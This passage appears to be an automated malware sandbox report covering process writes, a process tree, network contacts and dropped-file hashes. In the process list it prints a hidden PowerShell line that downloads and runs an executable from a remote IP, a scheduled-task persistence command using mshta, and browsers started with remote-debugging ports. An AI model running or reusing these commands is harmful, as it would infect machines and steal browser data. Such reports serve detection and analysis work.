PID 3900 wrote to memory of 3604 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 3900 wrote to memory of 3604 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 3900 wrote to memory of 3604 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 4504 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe
PID 4504 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe
PID 4504 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe
PID 3604 wrote to memory of 864 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3604 wrote to memory of 864 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 864 wrote to memory of 4432 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 864 wrote to memory of 4432 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 864 wrote to memory of 2948 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 864 wrote to memory of 2948 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 864 wrote to memory of 2948 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 864 wrote to memory of 2948 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 864 wrote to memory of 2948 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 864 wrote to memory of 2948 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 864 wrote to memory of 2948 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 864 wrote to memory of 2948 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 864 wrote to memory of 2948 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 864 wrote to memory of 2948 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 864 wrote to memory of 2948 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 864 wrote to memory of 2948 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 864 wrote to memory of 2948 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 864 wrote to memory of 2948 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\quarantine\am_no.bat"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\quarantine\am_no.bat" any_word

C:\Windows\system32\timeout.exe

timeout /t 2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\system32\schtasks.exe

schtasks /create /tn "ZDWezmacBOG" /tr "mshta \"C:\Temp\DWmIMSN8O.hta\"" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\system32\mshta.exe

mshta "C:\Temp\DWmIMSN8O.hta"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe

"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"

C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe

"C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe"

C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe

"C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3900 -ip 3900

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3900 -s 800

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe

"C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff952f5cc40,0x7ff952f5cc4c,0x7ff952f5cc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1972,i,12143925258121534355,4169434266017795774,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1968 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1956,i,12143925258121534355,4169434266017795774,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2008 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2272,i,12143925258121534355,4169434266017795774,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2496 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3200,i,12143925258121534355,4169434266017795774,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3220 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3228,i,12143925258121534355,4169434266017795774,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3264 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4176,i,12143925258121534355,4169434266017795774,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4536 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4708,i,12143925258121534355,4169434266017795774,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3644 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4768,i,12143925258121534355,4169434266017795774,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4780 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4844,i,12143925258121534355,4169434266017795774,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4832 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe

"C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4980,i,12143925258121534355,4169434266017795774,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4992 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5136,i,12143925258121534355,4169434266017795774,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5024 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4996,i,12143925258121534355,4169434266017795774,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5008 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5012,i,12143925258121534355,4169434266017795774,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5068 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5092,i,12143925258121534355,4169434266017795774,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5088 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5240,i,12143925258121534355,4169434266017795774,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5184 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Users\Admin\AppData\Local\Temp\10003000101\ab9ee55ffa.exe

"C:\Users\Admin\AppData\Local\Temp\10003000101\ab9ee55ffa.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff952f646f8,0x7ff952f64708,0x7ff952f64718

C:\Users\Admin\AppData\Local\Temp\10003000101\ab9ee55ffa.exe

"C:\Users\Admin\AppData\Local\Temp\10003000101\ab9ee55ffa.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 5240 -ip 5240

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5240 -s 788

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,16288525578568117271,9903415758202988459,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2148 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2136,16288525578568117271,9903415758202988459,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2136,16288525578568117271,9903415758202988459,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2740 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2136,16288525578568117271,9903415758202988459,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2136,16288525578568117271,9903415758202988459,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2136,16288525578568117271,9903415758202988459,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4728 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2136,16288525578568117271,9903415758202988459,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3996 /prefetch:1

Network

Country Destination Domain Proto
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 g.bing.com udp
US 150.171.28.10:443 g.bing.com tcp
RU 185.215.113.16:80 185.215.113.16 tcp
RU 176.113.115.6:80 176.113.115.6 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 go.advisewise.me udp
DE 116.203.10.65:443 go.advisewise.me tcp
DE 116.203.10.65:443 go.advisewise.me tcp
DE 116.203.10.65:443 go.advisewise.me tcp
US 8.8.8.8:53 e6.o.lencr.org udp
GB 2.23.210.82:80 e6.o.lencr.org tcp
DE 116.203.10.65:443 go.advisewise.me tcp
DE 116.203.10.65:443 go.advisewise.me tcp
DE 116.203.10.65:443 go.advisewise.me tcp
DE 116.203.10.65:443 go.advisewise.me tcp
DE 116.203.10.65:443 go.advisewise.me tcp
DE 116.203.10.65:443 go.advisewise.me tcp
US 8.8.8.8:53 embarkiffe.shop udp
US 8.8.8.8:53 uncertainyelemz.bet udp
US 8.8.8.8:53 hobbyedsmoker.live udp
DE 116.203.10.65:443 go.advisewise.me tcp
US 8.8.8.8:53 dsfljsdfjewf.info udp
US 8.8.8.8:53 deaddereaste.today udp
US 8.8.8.8:53 subawhipnator.life udp
US 8.8.8.8:53 privileggoe.live udp
US 8.8.8.8:53 decreaserid.world udp
US 8.8.8.8:53 pastedeputten.life udp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.82.234.109:443 steamcommunity.com tcp
US 8.8.8.8:53 disobilittyhell.live udp
US 104.21.81.29:443 disobilittyhell.live tcp
US 8.8.8.8:53 www.google.com udp
NL 172.217.23.196:443 www.google.com tcp
NL 172.217.23.196:443 www.google.com udp
US 104.21.81.29:443 disobilittyhell.live tcp
US 8.8.8.8:53 ogads-pa.googleapis.com udp
US 8.8.8.8:53 apis.google.com udp
NL 216.58.214.10:443 ogads-pa.googleapis.com udp
NL 172.217.168.206:443 apis.google.com udp
NL 216.58.214.10:443 ogads-pa.googleapis.com tcp
US 104.21.81.29:443 disobilittyhell.live tcp
US 8.8.8.8:53 play.google.com udp
NL 142.251.39.110:443 play.google.com udp
NL 142.251.39.110:443 play.google.com tcp
NL 142.251.39.110:443 play.google.com udp
NL 142.251.39.110:443 play.google.com tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 clients2.google.com udp
NL 142.251.36.46:443 clients2.google.com udp
NL 142.251.36.46:443 clients2.google.com tcp
US 8.8.8.8:53 clients2.googleusercontent.com udp
NL 142.250.179.129:443 clients2.googleusercontent.com udp
US 8.8.8.8:53 calmingtefxtures.run udp
US 172.67.158.171:443 calmingtefxtures.run tcp
US 8.8.8.8:53 foresctwhispers.top udp
US 104.21.48.1:443 foresctwhispers.top tcp
US 8.8.8.8:53 tracnquilforest.life udp
US 172.67.164.79:443 tracnquilforest.life tcp
US 8.8.8.8:53 presentymusse.world udp
US 8.8.8.8:53 deaddereaste.today udp
US 8.8.8.8:53 subawhipnator.life udp
US 8.8.8.8:53 privileggoe.live udp
US 8.8.8.8:53 boltetuurked.digital udp
US 8.8.8.8:53 pastedeputten.life udp
GB 104.82.234.109:443 steamcommunity.com tcp
US 104.21.81.29:443 disobilittyhell.live tcp
DE 116.203.10.65:443 go.advisewise.me tcp
N/A 127.0.0.1:9223 tcp
N/A 127.0.0.1:9223 tcp
US 104.21.81.29:443 disobilittyhell.live tcp
DE 116.203.10.65:443 go.advisewise.me tcp
US 104.21.81.29:443 disobilittyhell.live tcp
US 104.21.96.1:443 foresctwhispers.top tcp
US 104.21.96.1:443 foresctwhispers.top tcp
US 104.21.96.1:443 foresctwhispers.top tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp

Files

memory/4508-0-0x00007FF9526A3000-0x00007FF9526A5000-memory.dmp

memory/4508-1-0x0000020E21E70000-0x0000020E21E92000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wpfztjut.3gs.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4508-11-0x00007FF9526A0000-0x00007FF953161000-memory.dmp

memory/4508-12-0x00007FF9526A0000-0x00007FF953161000-memory.dmp

memory/4508-15-0x00007FF9526A0000-0x00007FF953161000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 2f57fde6b33e89a63cf0dfdd6e60a351
SHA1 445bf1b07223a04f8a159581a3d37d630273010f
SHA256 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA512 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 acbae3a20017316bcc01b2f407be68e7
SHA1 3ae35ab773fcbcd982ffcc909ad4e8aa1a3a29fb
SHA256 fb4454cf124dcf8edf65a40b0bec05b653a57b5166cfd4aedb2ff1d49b12ca3d
SHA512 b62f4419ab16fdb0a5fc22bc0eb6fa0745c9135d4b450c595e948da793e8cbf0f3defacf59c733d56309d412eaf2fc020c452efe40c9a1f632f28f241101f5dc

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e5bfec1063a497048fffb231a0621403
SHA1 97cf6a89f237f43b9c22e3e081f7d45924d435ba
SHA256 325d1ffa65e9593a834f3662168d0c1950de148c63f1e43b86727087f3881d6f
SHA512 e38c5189054cf09fb15de017d0bbe226338124ee02bb04530943c8fcfc303dbe5fe5fd28c9c1aea1b552d1a2b0b76cabbedd284a38a07d41ec9cf9e55b44dd0e

C:\Temp\DWmIMSN8O.hta

MD5 16d76e35baeb05bc069a12dce9da83f9
SHA1 f419fd74265369666595c7ce7823ef75b40b2768
SHA256 456b0f7b0be895af21c11af10a2f10ce0f02ead47bdf1de8117d4db4f7e4c3e7
SHA512 4063efb47edf9f8b64ef68ad7a2845c31535f3679b6368f9cb402411c7918b82bd6355982821bfb3b7de860b5979b8b0355c15f4d18f85d894e2f2c8e95ef18e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1f0f8c49b22409ca78499f5df1ce9456
SHA1 5300f7ed636959c8c8366418e891dbe49a3edba9
SHA256 429128efcec165baf50a81021e610933e1020f5298d865f7b30daf370fb22014
SHA512 ca976a7ab0ef4782c3003433e8d99d34d8060cb3a8790e787b56db1e207902b9dd15ecb6e76fecbd00f5e83a8add34329b25f86b90c62055f0d0d1de5607d2af

C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe

MD5 a92d6465d69430b38cbc16bf1c6a7210
SHA1 421fadebee484c9d19b9cb18faf3b0f5d9b7a554
SHA256 3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77
SHA512 0fc65c930a01db8cf306252402c47cf00b1222cd9d9736baf839488cdd6cf96ae8be479e08282ec7f34b665250580466a25cdfc699f4ecef6d5e4d543db8c345

C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe

MD5 4871c39a4a7c16a4547820b8c749a32c
SHA1 09728bba8d55355e9434305941e14403a8e1ca63
SHA256 8aa3e2705e32e8175242fcf19391ab909037111f19cf5f9953885c911f440453
SHA512 32fa81a1501b727cda79d25159e60ee5c627a8f4db6cbcc741b022d3d6e45c43eeb4fbcd8c8043f71bc23a4a326f66553314384c39c97aaf58b6385d9aac26ec

memory/3900-89-0x00000000001B0000-0x00000000001DC000-memory.dmp

memory/3900-90-0x0000000005050000-0x00000000055F4000-memory.dmp

memory/3604-92-0x0000000000400000-0x0000000000429000-memory.dmp

memory/3604-94-0x0000000000400000-0x0000000000429000-memory.dmp

memory/3604-101-0x0000000000400000-0x0000000000429000-memory.dmp

memory/3604-103-0x0000000000400000-0x0000000000429000-memory.dmp

memory/3604-108-0x0000000000400000-0x0000000000429000-memory.dmp

memory/3604-109-0x0000000000400000-0x0000000000429000-memory.dmp

memory/3604-112-0x0000000000400000-0x0000000000429000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe

MD5 21cbf1c19605fa8a2dc9cd40990139ca
SHA1 a2c2c891b7f156bbf46428889cec083a4ae1b94c
SHA256 2bed46c8233ce24e911ae5264ffd59ec0932e711c2e5ba8d4171d34684d156ac
SHA512 43fe77ca93a34fdab17e508933c5476b149103320cce0abd44ea5bbe7ab91eec9990c3fce591f0ccd677b375ca74225e45d27638e5459e949cd18d78a61e3e00

memory/1232-127-0x00000000008E0000-0x0000000000BE9000-memory.dmp

memory/3604-131-0x0000000000400000-0x0000000000429000-memory.dmp

memory/3604-132-0x0000000000400000-0x0000000000429000-memory.dmp

memory/3604-136-0x0000000000400000-0x0000000000429000-memory.dmp

memory/3604-137-0x0000000000400000-0x0000000000429000-memory.dmp

memory/3604-141-0x0000000000400000-0x0000000000429000-memory.dmp

\??\pipe\crashpad_864_AQGFMUPYXXQOLAOY

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

memory/1232-172-0x00000000008E0000-0x0000000000BE9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe

MD5 2f78a06ed676b813f5e094010267b7aa
SHA1 9a418672d952366730a9f3e83b5edb99fc9e80c7
